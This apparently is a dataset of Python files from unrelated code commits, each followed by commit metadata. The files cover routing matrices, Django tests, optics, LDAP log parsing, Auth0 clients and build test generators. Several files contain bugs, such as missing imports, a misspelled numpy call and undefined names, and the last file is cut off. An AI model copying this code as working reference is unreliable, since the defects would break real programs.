import polyline
import time
import json
db_points = []
# grab points from csv file - just grab, x, y, and a unique ID
# the headers may be different depending on your data!
with open("db.csv", 'r') as csvfile:
reader = csv.DictReader(csvfile)
n = 0
q = 0
for row in reader:
# limiting number of points for testing, may do all eventually!
if n % 1 == 0:
q += 1
db_points.append([row['X'],row['Y'],row['dbuid']])
n += 1
# split up into managable size - 2000 destinations seems managable
point_count = len(db_points)
points_split_list = []
single_list = []
i = 1
for row in db_points:
single_list.append(row)
if i % 3000 == 0:
points_split_list.append(single_list)
single_list = []
if i == len(db_points):
points_split_list.append(single_list)
i += 1
# print lenghts of before and after
print len(db_points)
print len(points_split_list)
for x in points_split_list:
print len(x)
# make sure these total!
# list of ids
dbuids = []
for row in db_points:
dbuids.append(row[2])
print len(dbuids)
# set up that awesome marix were going to output!
the_matrix = []
# lets add in a header row!
the_matrix.append([''] + dbuids)
print len(the_matrix)
print len(the_matrix[0])
# the start time for time timing
start_time = time.time()
# loop over the origins
for origin in db_points:
# the output row!
out_row = [origin[2]]
for points in points_split_list:
polyline_list = []
polyline_list.append((float(origin[1]),float(origin[0])))
# grab x y for lists
for row in points:
dr_tuple = (float(row[1]),float(row[0]))
polyline_list.append(dr_tuple)
line = polyline.encode(polyline_list, 5)
# what to send
url = 'http://localhost:5000/table/v1/driving/polyline(' + line + ')?sources=0'
# sending and recieving
page = requests.get(url)
data = json.loads(page.content)
durs = data["durations"][0]
del durs[0] # deleting initial 0
out_row = out_row + durs
the_matrix.append(out_row)
# this break is for testing!
break
print time.time() - start_time
for row in the_matrix:
print len(row)
| Python | 0.006322 | |
41a533ffddfebc3303a1e882bfaf1fcdd243828e | add api like test | myideas/core/tests/test_like_api.py | myideas/core/tests/test_like_api.py | from django.test import TestCase
from django.test.client import Client
from django.shortcuts import resolve_url as r
from django.contrib.auth.models import User
from myideas.core.models import Ideas
class LikeApiTest(TestCase):
def setUp(self):
self.client = Client()
self.username = 'diego'
self.email = 'test@djangoapp.com'
self.password = 'test'
user = User.objects.create_user(
self.username, self.email, self.password
)
self.idea = Ideas.objects.create(
user=user, title='test app'
)
def api_signin_and_get(self):
self.login = self.client.login(
username=self.username, password=self.password
)
self.response = self.client.get(r(self.idea.get_api_like_url()))
def test_get(self):
"""GET 'Ideas like api' must return status code 200"""
self.api_signin_and_get()
self.assertEqual(200, self.response.status_code)
def test_api_status(self):
self.api_signin_and_get()
self.assertTrue(self.response)
def test_api_likes_count(self):
self.api_signin_and_get()
self.assertEqual(1, self.idea.likes.count())
def test_access_forbidden(self):
"""GET page not logged in must return status code 403"""
self.response = self.client.get(r(self.idea.get_api_like_url()))
self.assertEqual(403, self.response.status_code)
| Python | 0 | |
10c19d0c7d7cdb2c823a698db8ca128134f32c5a | Add beam potential generation | otz/Beam.py | otz/Beam.py | import pdb
import numpy as np
import scipy as sp
h = 6.626E-34
c = 3.0E8
def uniform(max_angle, intensity):
def profile(phi):
if (abs(phi) < max_angle):
return intensity
else:
return 0
return profile
def default_profile(angle):
return uniform(np.pi/8.0, 1)(angle)
class Bead:
def __init__(self, diameter, index=2, mass=1, r=0, z=None):
self.disable = diameter
self.radius = diameter/2.0
self.mass = mass
self.r = r
if z is None:
z = diameter
self.z = z
self.index = index
def set_position(self, r, z):
self.r = r
self.z = z
class Beam:
def __init__(self, wavelength, profile=default_profile):
self.profile = profile
self.wavelength = wavelength
def force(self, bead):
r = bead.r
z = bead.z
n = bead.index
R = bead.radius
d = np.sqrt(z**2+r**2)
phi_prime = np.arctan2(r,z)
def theta(phi):
return np.arctan2(R*np.sin(phi),d-R*np.cos(phi))
def theta_prime(phi):
return theta(phi-phi_prime)
def theta2(phi):
return np.arcsin(np.sin(phi+theta_prime(phi))/n)
def delta_theta(phi):
return 2*theta2(phi)
def p(phi):
return self.profile(phi)*h*c/self.wavelength
def dF_r(phi):
return -p(phi)*(np.sin(theta_prime(phi))-np.sin(theta_prime(phi)+delta_theta(phi)))
def dF_z(phi):
return -p(phi)*(np.cos(theta_prime(phi))-np.cos(theta_prime(phi)+delta_theta(phi)))
F_r = sp.integrate.quad(dF_r, -np.pi/2.0, np.pi/2.0)
F_z = sp.integrate.quad(dF_z, -np.pi/2.0, np.pi/2.0)
return (F_r, F_z)
def r_potential(self, bead, r_lim=None, z=None, dx = None):
if r_lim is None:
r_lim = 2*bead.radius
if z is not None:
bead.z = z
if dx is None:
dx = r_lim/1e4
r = np.arange(-r_lim, r_lim, dx)
def restoring_force(dist):
bead.r = dist
return self.force(bead)[0][0]
force_r = [restoring_force(dist) for dist in r]
V = sp.integrate.cumtrapz(force_r, r)
return (r[:-1],V)
| Python | 0 | |
ad5018c045a14f2e8360e8118d73d021df10baab | add solution for Course Schedule II | algorithms/courseScheduleII/courseScheduleII.py | algorithms/courseScheduleII/courseScheduleII.py | class Solution:
# @param {integer} numCourses
# @param {integer[][]} prerequisites
# @return {integer[]}
def findOrder(self, numCourses, prerequisites):
g = {v: [] for v in xrange(numCourses)}
deg = {v: 0 for v in xrange(numCourses)}
s = set(range(numCourses))
for u, v in prerequisites:
g[v].append(u)
deg[u] += 1
s.discard(u)
res = []
while s:
u = s.pop()
res.append(u)
for v in g[u]:
deg[v] -= 1
if deg[v] == 0:
s.add(v)
return [] if len(res) != numCourses else res
| Python | 0 | |
4557cce84ff91e830f1f1fd241223cff70ceb46e | add directions and a script for how I found duplicate functions | deprecated/utils/tags-to-dup-functions.py | deprecated/utils/tags-to-dup-functions.py | # Run the below command to generate the TAGS file, then run this script with TAGS as stdin to see duplicate function names
#
# find . -name \*.c -not -path ./deprecated/\* -print0 | xargs -0 etags --declarations -D --no-globals -I --no-members
import collections
import sys
src_file = None
got_section_header = 0
# function name => list of files
functions = collections.defaultdict(lambda: set())
for line in sys.stdin:
line = line.rstrip('\r\n')
if got_section_header == 0:
if line != "\x0c":
exit("invalid header first line: %s" % line)
got_section_header = 1
elif got_section_header == 1:
src_file, sep, tail = line.rpartition(',')
if sep != ',':
exit("invalid header second line: %s" % line)
got_section_header = 2
elif got_section_header == 2:
if line == "\x0c":
got_section_header = 1
else:
definition, sep, tail = line.rpartition('\x7f')
if sep != '\x7f':
exit("invalid definition line: %s" % line)
if definition[-1] == '(':
head, sep, function = definition.rpartition(' ')
if sep != ' ':
function = sep
function = function.rstrip('(')
function = function.lstrip('*')
functions[function].add(src_file)
else:
exit("unexpected value for got_section_header, %s" % got_section_header);
for k, v in functions.iteritems():
if len(v) > 1:
print k, len(v), ' '.join(v)
| Python | 0 | |
4331b380e43751a7223e0ee1dee6c1c45ad09a67 | add levy function | robo/task/levy.py | robo/task/levy.py | '''
Created on 12.07.2015
@author: Aaron Klein
'''
import numpy as np
from robo.task.base_task import BaseTask
class Levy(BaseTask):
def __init__(self):
X_lower = np.array([-15])
X_upper = np.array([10])
opt = np.array([[1.0]])
fopt = 0.0
super(Levy, self).__init__(X_lower, X_upper, opt=opt, fopt=fopt)
def objective_function(self, x):
z = 1 + ((x - 1.) / 4.)
s = np.power((np.sin(np.pi * z)), 2)
y = (s + ((z - 1) ** 2) * (1 + np.power((np.sin(2 * np.pi * z)), 2)))
return y[:, np.newaxis]
def objective_function_test(self, x):
return self.objective_function(x)
| Python | 0.000004 | |
f2c6e7cf6e60eac5222658d89baf28e1e7d12939 | Test minimal snoop2 | platforms/m3/programming/mbus_snoop_img2.py | platforms/m3/programming/mbus_snoop_img2.py | #!/usr/bin/python
import os
import sys
import logging
import csv
import time
import datetime
from datetime import datetime
import m3_common
#m3_common.configure_root_logger()
#logger = logging.getLogger(__name__)
from m3_logging import get_logger
logger = get_logger(__name__)
def Bpp_callback(address, data, cb0, cb1):
print(" Time: " + datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")[:-3] + " ADDR: 0x" + address.encode('hex') + " DATA: 0x" + data.encode('hex') + " (ACK: " + str(not cb1) + ")")
m = m3_common.mbus_snooper(Bpp_callback)
m.hang_for_messages()
| Python | 0.000001 | |
a8c7c6f08571449b618fd57f298546da6ef80ee9 | Add a pyastro16.py file to use as an auto doc demo | astrospam/pyastro16.py | astrospam/pyastro16.py | """
Python in Astronomy 2016 is the second iteration of the Python in Astronomy
conference series.
This is the docstring for the pyastro module, this gets included as the
description for the module.
"""
import numpy as np
def times(a, b):
"""
Multiply a by b.
Parameters
----------
a : `numpy.ndarray`
Array one.
b : `numpy.ndarray`
Array two
Returns
-------
result : `numpy.ndarray`
``a`` multiplied by ``b``
"""
return np.multipy(a, b)
class PyAstro(object):
"""
This is a class docstring, here you must describe the parameters for the
creation of the class, which is normally the signature of the ``__init__``
method.
Parameters
----------
awesomeness_level : `int`
How awesome is pyastro16??!
day : `int`
Day of the conference. Defaults to 1.
Attributes
----------
awesomeness_level: `int`
How awesome is this class attributes?! You can document attributes that
are not properties here.
"""
def __init__(self, awesomeness_level, day=1):
"""
This docstring is not used, because it is for a hidden method.
"""
self.awesomeness_level = awesomeness_level
self._day = day
@property
def day(self):
"""
Day of the conference.
Properties are automatically documented as attributes
"""
return self._day
| Python | 0 | |
9af2a8341b59098d0ebb88f1e71a3452c338b191 | Add a plotting example. | Lib/sandbox/pyem/examples/plotexamples.py | Lib/sandbox/pyem/examples/plotexamples.py | #! /usr/bin/env python
# Last Change: Mon Jun 11 03:00 PM 2007 J
# This is a simple test to check whether plotting ellipsoides of confidence and
# isodensity contours match
import numpy as N
from numpy.testing import set_package_path, restore_path
import pylab as P
set_package_path()
import pyem
restore_path()
# Generate a simple mixture model, plot its confidence ellipses + isodensity
# curves for both diagonal and full covariance matrices
d = 3
k = 3
dim = [0, 2]
# diag model
w, mu, va = pyem.GM.gen_param(d, k)
dgm = pyem.GM.fromvalues(w, mu, va)
# full model
w, mu, va = pyem.GM.gen_param(d, k, 'full', spread = 1)
fgm = pyem.GM.fromvalues(w, mu, va)
def plot_model(gm, dim):
X, Y, Z, V = gm.density_on_grid(dim = dim)
h = gm.plot(dim = dim)
[i.set_linestyle('-.') for i in h]
P.contour(X, Y, Z, V)
data = gm.sample(200)
P.plot(data[:, dim[0]], data[:,dim[1]], '.')
# Plot the contours and the ellipsoids of confidence
P.subplot(2, 1, 1)
plot_model(dgm, dim)
P.subplot(2, 1, 2)
plot_model(fgm, dim)
P.show()
| Python | 0.000001 | |
71ac93da2eed58bbd53bb13d4ade308404be18ad | Add auth0.v2.connection | auth0/v2/connection.py | auth0/v2/connection.py | from .rest import RestClient
class Connection(object):
"""Auth0 connection endpoints"""
def __init__(self, domain, jwt_token):
url = 'https://%s/api/v2/connections' % domain
self.client = RestClient(endpoint=url, jwt=jwt_token)
def all(self, strategy=None, fields=[], include_fields=True):
"""Retrieves all connections.
Args:
strategy (str, optional): Only retrieve connections of
this strategy type. (e.g: strategy='amazon')
fields (list of str, optional): A list of fields to include or
exclude from the result (depending on include_fields). Empty to
retrieve all fields.
include_fields (bool, optional): True if the fields specified are
to be include in the result, False otherwise.
Returns:
A list of connection objects.
"""
params = {'strategy': strategy or None,
'fields': ','.join(fields) or None,
'include_fields': str(include_fields).lower()}
return self.client.get(params=params)
def get(self, id, fields=[], include_fields=True):
"""Retrieve connection by id.
Args:
id (str): Id of the connection to get.
fields (list of str, optional): A list of fields to include or
exclude from the result (depending on include_fields). Empty to
retrieve all fields.
include_fields (bool, optional): True if the fields specified are
to be include in the result, False otherwise.
Returns:
A connection object.
"""
params = {'fields': ','.join(fields) or None,
'include_fields': str(include_fields).lower()}
return self.client.get(params=params, id=id)
def delete(self, id):
"""Deletes a connection and all its users.
Args:
id: Id of the connection to delete.
Returns:
An empty dict.
"""
return self.client.delete(id=id)
def update(self, id, body):
"""Modifies a connection.
Args:
id: Id of the connection.
body (dict): Specifies which fields are to be modified, and to what
values.
Returns:
The modified connection object.
"""
return self.client.patch(id=id, data=body)
def create(self, body):
"""Creates a new connection. """
return self.client.post(data=body)
| Python | 0 | |
ea0d9781f3bfb74d6678ca5e353a250a18c5f03e | Use Tilde organizer (with Berlinium GUI) as a bibliography manager | utils/add_pdf_articles.py | utils/add_pdf_articles.py | """
This script introduces how the Tilde organizer
can be used as a bibliography manager.
See https://github.com/tilde-lab/pycrystal/tree/master/papers
for an example usage for the CRYSTAL17 code online bibliography.
Two files are currently needed:
* bib_els_file (raw bibliography items as presented online)
* bib_data_file (processed bibliography items, e.g. with DOI, PDF, etc.)
"""
import os
import sys
import json
import random
from hashlib import md5
import chk_tilde_install
from tilde.core.api import API
from tilde.core.settings import connect_database, settings
from tilde.parsers import Output
# these mappings were absent in the CRYSTAL17 online bibliography
MISSING_MAPPING = {'to127': ['O', 'Zr'], 'knaup2005': ['C', 'O', 'Si'], 'catti2000': ['O', 'Si'], 'to307': ['H', 'O', 'Si'], 'sto52': ['H', 'O', 'Si'], 'lindsay98': ['Cl', 'Si'], 'mukhopadhyay2004': ['O', 'Si'], 'to279': ['O', 'Si'], 'Gibbs99a': ['O', 'Si'], 'gibbs1999': ['O', 'Si'], 'gibbs2003': ['O', 'Si'], 'gibbs2006': ['Na', 'Mg', 'Al', 'Si', 'B', 'N', 'C', 'S', 'P', 'O'], 'sto89': ['O', 'Si'], 'to220': ['C', 'Si'], 'zwijnenburg2007': ['O', 'Si'], 'to264': ['O', 'Si'], 'goumans2007': ['O', 'Si'], 'to45': ['C', 'Si'], 'sonnet1999': ['Si'], 'to253': ['O', 'Si'], 'gnani2000': ['O', 'Si'], 'zwijnenburg2006': ['Si', 'Ge', 'Be', 'O', 'F', 'S'], 'to44': ['Si'], 'to126': ['Si'], 'knaup2005b': ['C', 'Si'], 'gibbs2000': ['O', 'Si'], 'sto72': ['Si'], 'sto92': ['H', 'Si']}
class PDF_Article(Output):
def __init__(self, filename):
Output.__init__(self, filename)
self.related_files.append(filename)
self.info['dtype'] = 0x1
def get_checksum(self):
if os.path.exists(self._filename):
hash_md5 = md5()
with open(self._filename, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
# NB. there are dups, and we need to workaround them
return hash_md5.hexdigest() + 'PDF'
self.related_files = []
# for non-ready items, TODO
return "".join([random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789") for _ in range(48)]) + 'PDF'
def set_meta_and_els(self, els):
self.info['elements'] = els
self.info['standard'] = ' / '.join(sorted(els))
self.info['formula'] = ' / '.join(sorted(els))
self.info['ng'] = 0
self.info['nelem'] = 0
self.info['H'] = 'unknown'
self.info['framework'] = 0x3 # CRYSTAL
self.info['ansatz'] = 0x3 # CRYSTAL
if __name__ == "__main__":
try:
bib_els_file = sys.argv[1]
bib_data_file = sys.argv[2]
except IndexError:
raise RuntimeError
f = open(bib_els_file)
els2bib = json.loads(f.read())
f.close()
f = open(bib_data_file)
data2meta = json.loads(f.read())
f.close()
folder = os.sep.join(bib_els_file.split(os.sep)[:-2])
session = connect_database(settings)
work = API()
data2els = {}
for el in els2bib['els2paperids']:
for article_item in set(els2bib['els2paperids'][el]): # FIXME? set, as we have dups els
data2els.setdefault(article_item, []).append(el)
data2els.update(MISSING_MAPPING)
for key in els2bib['paperids2bib']:
# for non-ready items, TODO
if key not in data2meta:
filename = 'data/NONCE'
doi = None
authors = els2bib['paperids2bib'][key][0].replace(' and ', ', ').encode('ascii', 'ignore').split(', ')
year = els2bib['paperids2bib'][key][2]
article_title = els2bib['paperids2bib'][key][1].encode('ascii', 'ignore')
pubdata = els2bib['paperids2bib'][key][3].encode('ascii', 'ignore')
print("Missing: %s, %s, %s (%s)" % (authors, article_title, pubdata, year))
else:
filename = data2meta[key][0]
doi = data2meta[key][1]
authors = data2meta[key][2].encode('ascii', 'ignore').split(', ')
year = data2meta[key][5]
article_title = data2meta[key][3].encode('ascii', 'ignore')
pubdata = data2meta[key][4].encode('ascii', 'ignore')
seen = set()
seen_add = seen.add
authors = [x for x in authors if not (x in seen or seen_add(x))] # preserving order
data_item = PDF_Article(os.path.join(folder, filename))
data_item.set_meta_and_els(data2els[key])
data_item.info['authors'] = authors
data_item.info['year'] = year
data_item.info['article_title'] = article_title
if doi: data_item.info['doi'] = doi
data_item.info['pubdata'] = pubdata
checksum, error = work.save(data_item, session)
if error:
print(error)
session.close()
| Python | 0 | |
7e600a791bec2f8639aae417a1ea052ca94cf7b9 | Add a largish auto-generated test for the aligned bundling feature, along with the script generating it. The test should never be modified manually. If anyone needs to change it, please change the script and re-run it. | testgen/mc-bundling-x86-gen.py | testgen/mc-bundling-x86-gen.py | #!/usr/bin/python
# Auto-generates an exhaustive and repetitive test for correct bundle-locked
# alignment on x86.
# For every possible offset in an aligned bundle, a bundle-locked group of every
# size in the inclusive range [1, bundle_size] is inserted. An appropriate CHECK
# is added to verify that NOP padding occurred (or did not occur) as expected.
# This script runs with Python 2.6+ (including 3.x)
from __future__ import print_function
BUNDLE_SIZE_POW2 = 4
BUNDLE_SIZE = 2 ** BUNDLE_SIZE_POW2
PREAMBLE = '''
# RUN: llvm-mc -filetype=obj -triple i386-pc-linux-gnu %s -o - \\
# RUN: | llvm-objdump -triple i386 -disassemble -no-show-raw-insn - | FileCheck %s
# !!! This test is auto-generated from utils/testgen/mc-bundling-x86-gen.py !!!
# It tests that bundle-aligned grouping works correctly in MC. Read the
# source of the script for more details.
.text
.bundle_align_mode {0}
'''.format(BUNDLE_SIZE_POW2).lstrip()
ALIGNTO = ' .align {0}, 0x90'
NOPFILL = ' .fill {0}, 1, 0x90'
def print_bundle_locked_sequence(len):
print(' .bundle_lock')
print(' .rept {0}'.format(len))
print(' inc %eax')
print(' .endr')
print(' .bundle_unlock')
def generate():
print(PREAMBLE)
ntest = 0
for instlen in range(1, BUNDLE_SIZE + 1):
for offset in range(0, BUNDLE_SIZE):
# Spread out all the instructions to not worry about cross-bundle
# interference.
print(ALIGNTO.format(2 * BUNDLE_SIZE))
print('INSTRLEN_{0}_OFFSET_{1}:'.format(instlen, offset))
if offset > 0:
print(NOPFILL.format(offset))
print_bundle_locked_sequence(instlen)
# Now generate an appropriate CHECK line
base_offset = ntest * 2 * BUNDLE_SIZE
inst_orig_offset = base_offset + offset # had it not been padded...
if offset + instlen > BUNDLE_SIZE:
# Padding needed
print('# CHECK: {0:x}: nop'.format(inst_orig_offset))
aligned_offset = (inst_orig_offset + instlen) & ~(BUNDLE_SIZE - 1)
print('# CHECK: {0:x}: incl'.format(aligned_offset))
else:
# No padding needed
print('# CHECK: {0:x}: incl'.format(inst_orig_offset))
print()
ntest += 1
if __name__ == '__main__':
generate()
| Python | 0.000021 | |
15150516e1915948b10abed70e964a5b6109013b | Add ExtractAttribute | tohu/derived_generators_NEW.py | tohu/derived_generators_NEW.py | import logging
from operator import attrgetter
from .base_NEW import TohuUltraBaseGenerator
__all__ = ['ExtractAttribute']
logger = logging.getLogger('tohu')
class ExtractAttribute(TohuUltraBaseGenerator):
"""
Generator which produces items that are attributes extracted from
the items produced by a different generator.
"""
def __init__(self, g, attr_name):
logger.debug(f"Extracting attribute '{attr_name}' from parent={g}")
self.parent = g
self.gen = g.clone()
self.attr_name = attr_name
self.attrgetter = attrgetter(attr_name)
def __repr__(self):
return f"<ExtractAttribute '{self.attr_name}' from {self.parent} >"
def spawn(self, dependency_mapping):
logger.warning(f'ExtractAttribute.spawn(): dependency_mapping={dependency_mapping}')
raise NotImplementedError()
def __next__(self):
return self.attrgetter(next(self.gen))
| Python | 0.000001 | |
c9afc35d2be96adea47e79a4c0042235e4ffd594 | add ldap-filter-cut.py | python/python/openldap/ldap-filter-cut.py | python/python/openldap/ldap-filter-cut.py | #!/usr/bin/env python
'''
Copyright (C) 2011 Bryan Maupin <bmaupincode@gmail.com>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
'''
Takes an OpenLDAP log file, cuts the filters out of it, and writes the unique
filters to a new file.
'''
import re
import sys
def main():
filters = []
pattern = re.compile('filter="(.*)"')
# the input file is the first argument to this script
infile_name = sys.argv[1]
infile = open(infile_name)
for line in infile:
match = pattern.search(line)
if match:
filter = match.group(1)
if filter not in filters:
filters.append(filter)
infile.close()
print '%s filters found' % (len(filters))
# the output file is the second argument to this script
outfile_name = sys.argv[2]
outfile = open(outfile_name, 'w')
for filter in filters:
outfile.write('%s\n' % (filter))
outfile.close()
# calls the main() function when the script runs
if __name__ == '__main__':
main()
| Python | 0.000001 | |
3a19187e8116e8dc20166786fb1ca4d14b527950 | Add missing IDL Visistor class | ppapi/generators/idl_visitor.py | ppapi/generators/idl_visitor.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Visitor Object for traversing AST """
#
# IDLVisitor
#
# The IDLVisitor class will traverse an AST truncating portions of the tree
# that fail due to class or version filters. For each node, after the filter
# passes, the visitor will call the 'Arive' member passing in the node and
# and data passing in from the parent call. It will then Visit the children.
# When done processing children, the visitor will call the 'Depart' member
# before returning
#
class IDLVisitor(object):
def __init__(self):
self.depth = 0
# Return TRUE if the node should be visited
def VisitFilter(self, node, data):
return True
# Return TRUE if data should be added to the childdata list
def AgrigateFilter(self, data):
return data is not None
def Visit(self, node, data):
self.depth += 1
if not self.VisitFilter(node, data): return None
childdata = []
newdata = self.Arrive(node, data)
for child in node.GetChildren():
ret = self.Visit(child, newdata)
if self.AgrigateFilter(ret):
childdata.append(ret)
out = self.Depart(node, newdata, childdata)
self.depth -= 1
return out
def Arrive(self, node, data):
return data
def Depart(self, node, data, childdata):
return data
#
# IDLVersionVisitor
#
# The IDLVersionVisitor will only visit nodes with intervals that include the
# version. It will also optionally filter based on a class list
#
class IDLVersionVisitor(object):
def __init__(self, version, classList):
self.version = version
self.classes = classes
def Filter(self, node, data):
if self.classList and node.cls not in self.classList: return False
if not node.IsVersion(self.version): return False
return True
class IDLRangeVisitor(object):
def __init__(self, vmin, vmax, classList):
self.vmin = vmin
self.vmax = vmax
self.classList = classList
def Filter(self, node, data):
if self.classList and node.cls not in self.classList: return False
if not node.IsVersion(self.version): return False
return True
| Python | 0.999835 | |
bbed7b813b6c809ee9615eabf2fcf4d3156b1c36 | Add script to convert release notes from Markdown | tools/convert_release_notes.py | tools/convert_release_notes.py | import sys
import mistune
print(sys.argv[1])
with open(sys.argv[1], "r") as source_file:
source = source_file.read()
html = mistune.Markdown()
print()
print("HTML")
print("=====================================")
print("From the <a href=\"\">GitHub release page</a>:\n<blockquote>")
print(html(source))
print("</blockquote>")
class AdafruitBBCodeRenderer:
def __init__(self, **kwargs):
self.options = kwargs
def placeholder(self):
return ''
def paragraph(self, text):
return text + "\n\n"
def text(self, text):
return text
def link(self, link, title, text):
return "[url={}]{}[/url]".format(link, text)
def header(self, text, level, raw):
return "[b][size=150]{}[/size][/b]\n".format(text)
def codespan(self, text):
return "[color=#E74C3C][size=95]{}[/size][/color]".format(text)
def list_item(self, text):
return "[*]{}[/*]\n".format(text.strip())
def list(self, body, ordered=True):
ordered_indicator = "=" if ordered else ""
return "[list{}]\n{}[/list]".format(ordered_indicator, body)
def double_emphasis(self, text):
return "[b]{}[/b]".format(text)
bbcode = mistune.Markdown(renderer=AdafruitBBCodeRenderer())
print()
print("BBCode")
print("=====================================")
print("From the [url=]GitHub release page[/url]:\n[quote]")
print(bbcode(source))
print("[/quote]")
| Python | 0 | |
c16c04bde2ace97a2eec000c87e23cfc27bfd7ec | Print trace counters with trace events. | tools/perf/metrics/timeline.py | tools/perf/metrics/timeline.py | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
from metrics import Metric
from telemetry.page import page_measurement
TRACING_MODE = 'tracing-mode'
TIMELINE_MODE = 'timeline-mode'
class TimelineMetric(Metric):
def __init__(self, mode):
assert mode in (TRACING_MODE, TIMELINE_MODE)
super(TimelineMetric, self).__init__()
self._mode = mode
self._model = None
self._thread_for_tab = None
def Start(self, page, tab):
self._model = None
self._thread_for_tab = None
if self._mode == TRACING_MODE:
if not tab.browser.supports_tracing:
raise Exception('Not supported')
tab.browser.StartTracing()
else:
assert self._mode == TIMELINE_MODE
tab.StartTimelineRecording()
def Stop(self, page, tab):
if self._mode == TRACING_MODE:
# This creates an async trace event in the render process for tab that
# will allow us to find that tab during the AddTracingResultsForTab
# function.
success = tab.EvaluateJavaScript("""
console.time("__loading_measurement_was_here__");
console.timeEnd("__loading_measurement_was_here__");
console.time.toString().indexOf('[native code]') != -1;
""")
trace_result = tab.browser.StopTracing()
if not success:
raise page_measurement.MeasurementFailure(
'Page stomped on console.time')
self._model = trace_result.AsTimelineModel()
events = [s for
s in self._model.GetAllEventsOfName(
'__loading_measurement_was_here__')
if s.parent_slice == None]
assert len(events) == 1, 'Expected one marker, got %d' % len(events)
# TODO(tonyg): This should be threads_for_tab and report events for both
# the starting thread and ending thread.
self._thread_for_tab = events[0].start_thread
else:
tab.StopTimelineRecording()
self._model = tab.timeline_model
self._thread_for_tab = self._model.GetAllThreads()[0]
def AddResults(self, tab, results):
assert self._model
events = self._thread_for_tab.all_slices
events_by_name = collections.defaultdict(list)
for e in events:
events_by_name[e.name].append(e)
for event_name, event_group in events_by_name.iteritems():
times = [event.self_time for event in event_group]
total = sum(times)
biggest_jank = max(times)
results.Add(event_name, 'ms', total)
results.Add(event_name + '_max', 'ms', biggest_jank)
results.Add(event_name + '_avg', 'ms', total / len(times))
counters_by_name = self._thread_for_tab.parent.counters
for counter_name, counter in counters_by_name.iteritems():
total = sum(counter.totals)
results.Add(counter_name, 'count', total)
results.Add(counter_name + '_avg', 'count', total / len(counter.totals))
| # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
from metrics import Metric
from telemetry.page import page_measurement
TRACING_MODE = 'tracing-mode'
TIMELINE_MODE = 'timeline-mode'
class TimelineMetric(Metric):
def __init__(self, mode):
assert mode in (TRACING_MODE, TIMELINE_MODE)
super(TimelineMetric, self).__init__()
self._mode = mode
self._model = None
self._thread_for_tab = None
def Start(self, page, tab):
self._model = None
self._thread_for_tab = None
if self._mode == TRACING_MODE:
if not tab.browser.supports_tracing:
raise Exception('Not supported')
tab.browser.StartTracing()
else:
assert self._mode == TIMELINE_MODE
tab.StartTimelineRecording()
def Stop(self, page, tab):
if self._mode == TRACING_MODE:
# This creates an async trace event in the render process for tab that
# will allow us to find that tab during the AddTracingResultsForTab
# function.
success = tab.EvaluateJavaScript("""
console.time("__loading_measurement_was_here__");
console.timeEnd("__loading_measurement_was_here__");
console.time.toString().indexOf('[native code]') != -1;
""")
trace_result = tab.browser.StopTracing()
if not success:
raise page_measurement.MeasurementFailure(
'Page stomped on console.time')
self._model = trace_result.AsTimelineModel()
events = [s for
s in self._model.GetAllEventsOfName(
'__loading_measurement_was_here__')
if s.parent_slice == None]
assert len(events) == 1, 'Expected one marker, got %d' % len(events)
# TODO(tonyg): This should be threads_for_tab and report events for both
# the starting thread and ending thread.
self._thread_for_tab = events[0].start_thread
else:
tab.StopTimelineRecording()
self._model = tab.timeline_model
self._thread_for_tab = self._model.GetAllThreads()[0]
def AddResults(self, tab, results):
assert self._model
events = self._thread_for_tab.all_slices
events_by_name = collections.defaultdict(list)
for e in events:
events_by_name[e.name].append(e)
for event_name, event_group in events_by_name.iteritems():
times = [event.self_time for event in event_group]
total = sum(times)
biggest_jank = max(times)
results.Add(event_name, 'ms', total)
results.Add(event_name + '_max', 'ms', biggest_jank)
results.Add(event_name + '_avg', 'ms', total / len(times))
| Python | 0.000002 |
1db5cd0fddbbcc1d38a08bfe8ad6cfb8d0b5c550 | add migration to create new model fields | coupons/migrations/0004_auto_20151105_1456.py | coupons/migrations/0004_auto_20151105_1456.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('coupons', '0003_auto_20150416_0617'),
]
operations = [
migrations.CreateModel(
name='CouponUser',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),
('redeemed_at', models.DateTimeField(blank=True, verbose_name='Redeemed at', null=True)),
],
),
migrations.AddField(
model_name='coupon',
name='user_limit',
field=models.PositiveIntegerField(verbose_name='User limit', default=1),
),
migrations.AlterField(
model_name='coupon',
name='type',
field=models.CharField(choices=[('monetary', 'Money based coupon'), ('percentage', 'Percentage discount'), ('virtual_currency', 'Virtual currency')], verbose_name='Type', max_length=20),
),
migrations.AddField(
model_name='couponuser',
name='coupon',
field=models.ForeignKey(related_name='users', to='coupons.Coupon'),
),
migrations.AddField(
model_name='couponuser',
name='user',
field=models.ForeignKey(null=True, to=settings.AUTH_USER_MODEL, blank=True, verbose_name='User'),
),
]
| Python | 0 | |
3bd7c50acfc8044fc33002530a5fcaa0b5c2152e | add module 'job' for reset queue | libs/qpanel/job.py | libs/qpanel/job.py | import backend
import config
from redis import Redis
from rq_scheduler import Scheduler
import datetime
def reset_stats_queue(queuename, when, hour):
'''
Reset stat for a queue on backend
queuename: Name of queue to reset
when, hour parameters for more easy
control for exists_job_onqueue
'''
remove_jobs_not_config()
if not exists_job_onqueue(queuename, when, hour):
return False
b = backend.Backend()
return b.reset_stats(queuename)
def job_reset_stats_queue(queuename, when, hour):
scheduler = Scheduler(connection=Redis())
remove_jobs_not_config()
if not exists_job_onqueue(queuename, when, hour):
scheduler.schedule(
